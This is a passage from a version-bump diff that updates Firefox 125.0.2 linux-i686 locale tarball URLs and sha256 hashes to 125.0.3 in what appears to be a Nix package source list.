"051c3f7ed00fd372275aea30306469f732aa7ec59fc08f98e04606d2cca1ae6d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/af/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/af/firefox-125.0.3.tar.bz2"; locale = "af"; arch = "linux-i686"; - sha256 = "2dd3e6ed95ed3ee56acbb8798b6d4ad0a4609b1e8cc711a778942b1f2ef91161"; + sha256 = "6d1ee2379de68187991326d0d89e13edd733424adab5a7d6cf5e9aaf3368feb1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/an/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/an/firefox-125.0.3.tar.bz2"; locale = "an"; arch = "linux-i686"; - sha256 = "15be5f74f58a8e6b34adec1554e0be02ddd115cc4f44d1935cb9bdf187b90e2c"; + sha256 = "0ecfa115508f05a7066be1927159faf3e02fe338df61d9c823a1936a56aabe95"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ar/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ar/firefox-125.0.3.tar.bz2"; locale = "ar"; arch = "linux-i686"; - sha256 = "d225f582cc7f4805815c5207961992019196b6c044a9c9722abae0e7f1a75810"; + sha256 = "af4cb6ee6c7215be5e199d9ca64867484de7e693a013d9a33eb410e8d9feaa0a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ast/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ast/firefox-125.0.3.tar.bz2"; locale = "ast"; arch = "linux-i686"; - sha256 = "6e94ecae9a7567f997f885c9e4d332b97c4f1cbc7df2f3c7cdeb61231aca5f80"; + sha256 = "04647b722d70f11d32f6a49dc4fda2f57560c96c3a098680b8e1964324cd9a18"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/az/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/az/firefox-125.0.3.tar.bz2"; locale = "az"; arch = "linux-i686"; - sha256 = "decbc3404707ebdef7f231adf6f4185f38fbef581b8def1ff4bb587e8973f0a1"; + sha256 = "499cd8960c5e21956372fcdcdbba8ce59929fdf3c199c94b604be235834fec9d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/be/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/be/firefox-125.0.3.tar.bz2"; locale = "be"; arch = "linux-i686"; - sha256 = "8422388e348bdff5dd6af1656a2e6270697b1427da851e09dd5a62e45eb14b50"; + sha256 = "215c1fda1f502d87c8685a8dfeb23d2b34b51c569de96cf52ba6a8179cdca4d5"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/bg/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/bg/firefox-125.0.3.tar.bz2"; locale = "bg"; arch = "linux-i686"; - sha256 = "b14c60a8ff41875d183608fc9763e9dd24975f078e08797c7589f6ed1769d1e5"; + sha256 = "d24acc50c74d070c9c3fcea8030914e08ec98f77a373f0c640f5c5644b52868e"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/bn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/bn/firefox-125.0.3.tar.bz2"; locale = "bn"; arch = "linux-i686"; - sha256 = "941a7fc7677cb3488608c81c727ce5799a651bf1b76727977af81c31bd3f3e95"; + sha256 = "c0f5570e5f05996e105485fa73580da3c4d3b7a0eb5db8cd1c6dd316b770d4f7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/br/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/br/firefox-125.0.3.tar.bz2"; locale = "br"; arch = "linux-i686"; - sha256 = "1e19bd29b6361aafdaf09fe6a9299434db0b240a68f3ad934cde2c8c4c03c790"; + sha256 = "7adc8a1c0397bc7e3390a598bb064d6abb318a2689be7e99a90f31c3346f557e"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/bs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/bs/firefox-125.0.3.tar.bz2"; locale = "bs"; arch = "linux-i686"; - sha256 = "7432eed3e1a2c8480d7610e209f7b55ab8c9084dfcae453adfba40e0d43a6fda"; + sha256 = "43d74f20af450faa633216821af7c1d37bb1a1c6a6ceeb75a0474adbf9b015ce"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ca-valencia/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ca-valencia/firefox-125.0.3.tar.bz2"; locale = "ca-valencia"; arch = "linux-i686"; - sha256 = "68fa72fa1145aeba1c40b8d1971f985814161ae63a502f68183dea627b36e3bd"; + sha256 = "1416a98df2841c0e9d3a783fd236f8e8c7f3dc4e17fe027e4cf04b8b0bde187b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ca/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ca/firefox-125.0.3.tar.bz2"; locale = "ca"; arch = "linux-i686"; - sha256 = "9f57ea19e727b409aee9783cdf0992918d9b586c87e59ba2d88b7b4cb8de182f"; + sha256 = "1c09a6d5ed0dfcae1d25fb9876c08663218f8a83bdc9f15ad52e39cd22428c5b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/cak/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/cak/firefox-125.0.3.tar.bz2"; locale = "cak"; arch = "linux-i686"; - sha256 = "a35a688ab4192a3b14c08c2a0ba70a36a98c9228ac74b8782be835761c84a930"; + sha256 = "6fbec6115cccaca619389d68cb917c331faeb19ca165f5b9e5425b78ffabf0d9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/cs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/cs/firefox-125.0.3.tar.bz2"; locale = "cs"; arch = "linux-i686"; - sha256 = "b52f8d472fbdc98c571e1915da8ece00f6b66b2d4f2fb3cfc9a0a87f96ec32fa"; + sha256 = "d1da5d44dd511d94341837c578eaa9d5aed5e2d63afc502b2b76b049d6110ece"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/cy/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/cy/firefox-125.0.3.tar.bz2"; locale = "cy"; arch = "linux-i686"; - sha256 = "6f10274a2ecd6358eba51cd9ca0d2548a30c1a9af074c92e00c8702385f2e2db"; + sha256 = "eddafcccca339deee2cd0e67885692217f7c49141ffc64ca1a998bb935d45636"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/da/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/da/firefox-125.0.3.tar.bz2"; locale = "da"; arch = "linux-i686"; - sha256 = "6ffc7d1e7ba3549fd68eb225a870b84807cf4c8277490a9ff5efa8118b629daf"; + sha256 = "d5a3a9ee1927f26b18ccf696aee7ebde30dd3ba439c9a376b4a6072d04756ca2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/de/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/de/firefox-125.0.3.tar.bz2"; locale = "de"; arch = "linux-i686"; - sha256 = "2530ca9be98f115521c34f6dbf2c7d8cf1e4b4a65ce087f702f390fd091ea27e"; + sha256 = "2d61def83c8a52b94828b14c2c8697c1b77106a4c16a7df1e9e258212d23b583"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/dsb/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/dsb/firefox-125.0.3.tar.bz2"; locale = "dsb"; arch = "linux-i686"; - sha256 = "1f6d8d87a4c0504fe2c076eaba0683dfd145df33101dd66bf422dcc1b08ec600"; + sha256 = "09f25336d1a46ec5cae5301d35e0573b205ccb3e1482c79b2f76db02045a9d18"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/el/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/el/firefox-125.0.3.tar.bz2"; locale = "el"; arch = "linux-i686"; - sha256 = "8d428453a25947a39236766e8896c84e264e5e0e79636eca5ad66de24dc4dacd"; + sha256 = "4e055eda0cbc2d8c71ce472982b26ef0c0ebc20f72dbd0a1d6b4f0d50a4966df"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/en-CA/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/en-CA/firefox-125.0.3.tar.bz2"; locale = "en-CA"; arch = "linux-i686"; - sha256 = "518d40beac437ef3974884572b504ecef611927f471bbd2673bac3ae79b524f6"; + sha256 = "5ab7b3ac4d84e949c47da2d3a77708847fe73214bd641562017359f71e254dc3"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/en-GB/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/en-GB/firefox-125.0.3.tar.bz2"; locale = "en-GB"; arch = "linux-i686"; - sha256 = "2f306743cb4d570058cd25adb6cc674ec21b98459a4127523d4748c694428481"; + sha256 = "dc793c9a3161974ed1120572d6b65d3ca5a5d8947e53cf1d31da33d4bba6ca82"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/en-US/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/en-US/firefox-125.0.3.tar.bz2"; locale = "en-US"; arch = "linux-i686"; - sha256 = "08ccf11fbd664b80f2f5f71da98e486b1bfed34e1fc5f85027810b0cdbde8962"; + sha256 = "1a7a16c2e75bfbd0e318095c259ab63fa0c097005b872d93885539c9f186ef80"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/eo/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/eo/firefox-125.0.3.tar.bz2"; locale = "eo"; arch = "linux-i686"; - sha256 = "6f3c5a5c92e19c8ee9371296604d354d1725ee52546d5d627c7b0039b72c77ff"; + sha256 = "bc78e75ccaa66dea4f2b8585dd2ec8217ac065058defcb991dc6628acb16c3cb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/es-AR/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/es-AR/firefox-125.0.3.tar.bz2"; locale = "es-AR"; arch = "linux-i686"; - sha256 = "e75e034b2e797eed918474f0ec6aad44a4b562f367ac4d3ae953676b4c58d1ef"; + sha256 = "da954c777d0441c30c6b292ebf8fe316e7b52d75a76602bf6502ba4677c1cb64"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/es-CL/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/es-CL/firefox-125.0.3.tar.bz2"; locale = "es-CL"; arch = "linux-i686"; - sha256 = "113e48f98b738dccca3f11ef7eeccbe740c3a6019d91c8cb0505f3c2faf6682c"; + sha256 = "c4282cba4b588da12708921ed5c3998f24d4d81790a677090c38529c297867bb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/es-ES/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/es-ES/firefox-125.0.3.tar.bz2"; locale = "es-ES"; arch = "linux-i686"; - sha256 = "a8beea1049c77a48b098fe8fe2121d0b0eb83edb471b53733dd1183effdc0bcd"; + sha256 = "15a1fed207e2c14e962c4e2eb8abe3cbc62d0621656b254675befe3d974d3cb5"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/es-MX/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/es-MX/firefox-125.0.3.tar.bz2"; locale = "es-MX"; arch = "linux-i686"; - sha256 = "796759fd53e134559142d88d2a0d242feca6120660345468665f0a9b08e49999"; + sha256 = "a962e53d6902ec7017ca3a8521c6b5730e7a7ae5244356c4d6d9117e50b37ebd"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/et/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/et/firefox-125.0.3.tar.bz2"; locale = "et"; arch = "linux-i686"; - sha256 = "3bea5fc06a710e69c23998f729463c767200bd0e0528d4ed89dadb55f20ab53d"; + sha256 = "9e58939f49650dcf0f0267d586919a3144eeec53ae58ef548613311bde905eb5"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/eu/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/eu/firefox-125.0.3.tar.bz2"; locale = "eu"; arch = "linux-i686"; - sha256 = "57e0087f574ab13a3aac00c732dfaaf5aa768fba8a56d086c56e19dcdc24de33"; + sha256 = "b5427601b225370def60f93e2f8cefe9600898183f0c184487bd95f8f86d2894"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/fa/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/fa/firefox-125.0.3.tar.bz2"; locale = "fa"; arch = "linux-i686"; - sha256 = "af7cad609b5a4b155b19c227c8664f6b9136655c804b44e7fa3c9100fe371baa"; + sha256 = "38fb2703b0e7fa9788aaa42dd1a89eadf616924c116f1b67b07f3d5df0963962"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ff/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ff/firefox-125.0.3.tar.bz2"; locale = "ff"; arch = "linux-i686"; - sha256 = "3148f266c40bc08bdac8fe3ea0f458c4a01b1bca60f5c2101d00901e0de4775d"; + sha256 = "a7b764758d16c901511062065eaa6e16414d777d8eea315424f19eecf54ef5e0"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/fi/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/fi/firefox-125.0.3.tar.bz2"; locale = "fi"; arch = "linux-i686"; - sha256 = "423be151b922259c88d36c92e54a60dea2f6328bfd086d32dc74cd1a6d0eedd6"; + sha256 = "153ce3d7f4ced7a280bbb5bd539913a55f6c0790fe756e8b5335539ac651f7e0"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/fr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/fr/firefox-125.0.3.tar.bz2"; locale = "fr"; arch = "linux-i686"; - sha256 = "946fa92a4e746e6755a6af0ca404135b8ba0388f57c8abb1f69963f3cf606811"; + sha256 = "b5aa0cff2a5493bbb816ae12f43ff79354a4946c1649173de767b1cf543a427e"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/fur/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/fur/firefox-125.0.3.tar.bz2"; locale = "fur"; arch = "linux-i686"; - sha256 = "931b5d7bfc87228770624e7ce6c437337fec17e54d4f3dfd03bead3692844d43"; + sha256 = "d4884765fa3c28e7236a6624aaff5f874c4a155b26d0b70d481109fea5159c84"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/fy-NL/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/fy-NL/firefox-125.0.3.tar.bz2"; locale = "fy-NL"; arch = "linux-i686"; - sha256 = "8c0745e61f0465ce452a13ec02c13bf1fdf497e2abc66d357b3c5aaf5a8b9ac2"; + sha256 = "49ebbe560e1960d34a2ab3258c05913ccc1d5bb60b3644dce6f4370733d7a59b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ga-IE/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ga-IE/firefox-125.0.3.tar.bz2"; locale = "ga-IE"; arch = "linux-i686"; - sha256 = "b2c1b6dd41a56fab2f7aaf049ed4afa4af80d1458ca3b3a56f630a9f39174edc"; + sha256 = "13d06ed7c8c73ecdeeb071a02d7aab98796927812127527be5f3b5fbcd9ea487"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/gd/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/gd/firefox-125.0.3.tar.bz2"; locale = "gd"; arch = "linux-i686"; - sha256 = "8701d32ecd572560bf26609857a0d7af6b5946774bbb820e49a54c55e175bc83"; + sha256 = "2435d0910e347581e1ff60217fd517b78e0464adc0d2b35b803bf8f83bf6d993"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/gl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/gl/firefox-125.0.3.tar.bz2"; locale = "gl"; arch = "linux-i686"; - sha256 = "a85edef215b2f9beaba5b3c396cfc248157dd7819eedde7fa420b8cd306ba816"; + sha256 = "cac5e02326f5ccdfb88e9cc1bdecc1060585b3274028f9050422834ea5559ede"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/gn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/gn/firefox-125.0.3.tar.bz2"; locale = "gn"; arch = "linux-i686"; - sha256 = "49a3b8909d29f5609a1da6477a43f719fe20ac178ac7d69299f8f21126f7f739"; + sha256 = "addcb8beed0a341c6eafc4894d11a6b3e8ff9c69c60442d674cac5dfa4552eb4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/gu-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/gu-IN/firefox-125.0.3.tar.bz2"; locale = "gu-IN"; arch = "linux-i686"; - sha256 = "44ea127c78193c5dc83f5bf8e5f2adca93d91e2ccc0266ca68b9d17c8f8cbc74"; + sha256 = "2342dc7b3996019edf66375533e5dd46e94db1cb7e37635002f3f7826c7b35cf"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/he/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/he/firefox-125.0.3.tar.bz2"; locale = "he"; arch = "linux-i686"; - sha256 = "2df30f0cdeed80e2d2dc1113db666b7340893fa52337d913ac6255e9823a6a2f"; + sha256 = "a6026c597c8f917006893da69998586b704b5ea89687a5a4f57f4fd1c6060c22"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/hi-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/hi-IN/firefox-125.0.3.tar.bz2"; locale = "hi-IN"; arch = "linux-i686"; - sha256 = "051e5df71df66353f8fe940efcffb8ec9b1586057d9118685387b713dea255d0"; + sha256 = "12d8bc4072ce6118f50aea48f1d0cf19ac2cde7a43b169dce92088058ee135c8"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/hr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/hr/firefox-125.0.3.tar.bz2"; locale = "hr"; arch = "linux-i686"; - sha256 = "0525bb2435c8e829534886e405f4e5802641a6659ad5276980d1bf5378903436"; + sha256 = "fa93237908e0a30fd911a2208cb1734d0480e9514877625fc7bb8a0a4f5eda89"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/hsb/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/hsb/firefox-125.0.3.tar.bz2"; locale = "hsb"; arch = "linux-i686"; - sha256 = "902793e7d135940797a44a4285cbae3f1b3a579740f386b1de463065d566d603"; + sha256 = "4936df4e7258830565e0718fe89375c8876d5318d65e92995a104498a0353846"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/hu/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/hu/firefox-125.0.3.tar.bz2"; locale = "hu"; arch = "linux-i686"; - sha256 = "127db71d94fd41770ffc4715d16fa2e7e9f9aed77db8ff21c566e74a3fa67931"; + sha256 = "2e87fc4c2965f25a0826348b1bb8296bb037c9213cfa4a7d86e65421b36c4527"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/hy-AM/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/hy-AM/firefox-125.0.3.tar.bz2"; locale = "hy-AM"; arch = "linux-i686"; - sha256 = "6479e62315e8402655a06f6e58765c8d8b71a1635af582f32e75a06d98603ebd"; + sha256 = "8a7660e5a5f5755daab77fe4bea805bef9124b3d7e1ede72f3f2b3ca0094b5db"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ia/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ia/firefox-125.0.3.tar.bz2"; locale = "ia"; arch = "linux-i686"; - sha256 = "5cb8656e668d2efc8c35228640a99696afd72f23d1a3702da25b3a5e8fe9d1ec"; + sha256 = "883a6bae7c4e2f72cb4bb1bee676058e9093d7069bccad29fab329d873d68075"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/id/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/id/firefox-125.0.3.tar.bz2"; locale = "id"; arch = "linux-i686"; - sha256 = "acf5464fe544b9b72ac650830bb4337acc851f037f9937e0d2932e2056fe06f9"; + sha256 = "0a2de5d0a841481f351d2f4e26fb4cf56592d580075b5ff08054b661e17bbacf"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/is/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/is/firefox-125.0.3.tar.bz2"; locale = "is"; arch = "linux-i686"; - sha256 = "28475ce33fbf59db4cb84775a2a7c39b641b3bea67dd1e7e49d5ace1878f306a"; + sha256 = "33376b28936467ff5c3fff5898ae1eeee882dd15d34d8d42b9010981cd27d53b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/it/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/it/firefox-125.0.3.tar.bz2"; locale = "it"; arch = "linux-i686"; - sha256 = "0b79a518da5b28aa74d22d3df117310c39521114b0e627d3d42bd694e06e6d90"; + sha256 = "37cc5b95d46d637633d7c368350683ab2e63871e7b8f574bb50cadec80adc558"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ja/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ja/firefox-125.0.3.tar.bz2"; locale = "ja"; arch = "linux-i686"; - sha256 = "e99dee56181843e5c1b1af336f1fb68c2c2eb7eeebed885c067bb57a5a62d56d"; + sha256 = "4feb22e07f2a536bf18c5cd9dd82a1b60e9d846f81d08326b119b19212088ba9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ka/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ka/firefox-125.0.3.tar.bz2"; locale = "ka"; arch = "linux-i686"; - sha256 = "a4657d7a0f8e2c445837cb42171780fa221ea528eddb7d17d23ba3afbd7592c5"; + sha256 = "e786417de882825c05b8385855eee0580cad0f64a14eec53966d90108c42d524"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/kab/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/kab/firefox-125.0.3.tar.bz2"; locale = "kab"; arch = "linux-i686"; - sha256 = "b36b00e250f6b1f1abbd816f7e0038f711b75e5a017bee285c3fa2995ac1ebc4"; + sha256 = "b58f6d29cb6ebac1407cf46bce238f80f56c60e4b400fc6beb9fefdaff19aede"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/kk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/kk/firefox-125.0.3.tar.bz2"; locale = "kk"; arch = "linux-i686"; - sha256 = "f66c2b7364f0b2742efe8e532dca7884b72a2811b72e3b0de0d8260ae007ec92"; + sha256 = "8d868c1553a1c8708f166d6b99cf0fede333366994c46d490014cf15330046e4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/km/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/km/firefox-125.0.3.tar.bz2"; locale = "km"; arch = "linux-i686"; - sha256 = "d137d33268cb376423d4395be1193af2bb73bee0e0b7726abe7e70d7b6d96ed5"; + sha256 = "deafa1829c27ed270718effd342cd9bc26453e5e6f64cdd7c83f0a86dec3533a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/kn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/kn/firefox-125.0.3.tar.bz2"; locale = "kn"; arch = "linux-i686"; - sha256 = "ac3aff36240512506a51543a9766bd85a796a2fb137666207fe221a0e17152e1"; + sha256 = "9a19b06844c60e9d4d6348c6b207273378228a59f1a831c9eb99e1073eba2a16"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ko/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ko/firefox-125.0.3.tar.bz2"; locale = "ko"; arch = "linux-i686"; - sha256 = "2af68d3e380de18efc36937193dfaadd8c438be39b45a297edf3fd9c73fff7be"; + sha256 = "bf79f74b659344291a745fa62aa726401f8c84369a96c0a13eb66be9bff2368d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/lij/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/lij/firefox-125.0.3.tar.bz2"; locale = "lij"; arch = "linux-i686"; - sha256 = "5c708d6c2c1b55b90c0728c7567132c61b6ceb64ed0c7be71c26218653e143bf"; + sha256 = "41c8b57d4426251b33c7d528cb23e635b22d3b81c4188c6844a39e87800fb9bf"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/lt/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/lt/firefox-125.0.3.tar.bz2"; locale = "lt"; arch = "linux-i686"; - sha256 = "7f2e33013772b3bf042415c45c1d75d407fe007167f628dcd14aaecc6855f088"; + sha256 = "34c57fa25ef83b9f6747e61eaeb4a98b312ffda9bcfdfb761392c94565e41348"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/lv/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/lv/firefox-125.0.3.tar.bz2"; locale = "lv"; arch = "linux-i686"; - sha256 = "1a736f61f8ca876ea12221fb23c54d3166f9c4d0edbe90839300ed1fef7d4c92"; + sha256 = "173afd7c09962de9af491917b7c14d245e02e6c109f69b9b7330466515dd1549"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/mk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/mk/firefox-125.0.3.tar.bz2"; locale = "mk"; arch = "linux-i686"; - sha256 = "c688a25f9113b2c688da4f4e9290f30a1fd2d2a23b54dadefb219f5d95d30bc2"; + sha256 = "b2ace494099bffc7d70d074197d1e4b0a9a387e553e4fffb31efce7d5f89053d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/mr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/mr/firefox-125.0.3.tar.bz2"; locale = "mr"; arch = "linux-i686"; - sha256 = 